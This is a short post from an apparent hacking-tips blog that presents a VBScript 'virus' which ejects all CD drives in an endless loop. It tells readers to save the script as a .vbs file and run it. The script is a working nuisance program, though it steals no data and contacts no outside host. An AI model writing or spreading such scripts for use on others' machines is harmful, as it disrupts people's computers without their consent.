HACKING HUB

hacking tutorials, full version softwares, tips & tricks

  •  

Copy the following script into notepad and save it as anyname.vbs like virus.vbs and then double click it
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

Categories:

0 Response for the "A virus that will open and close your CD ROM"

Post a Comment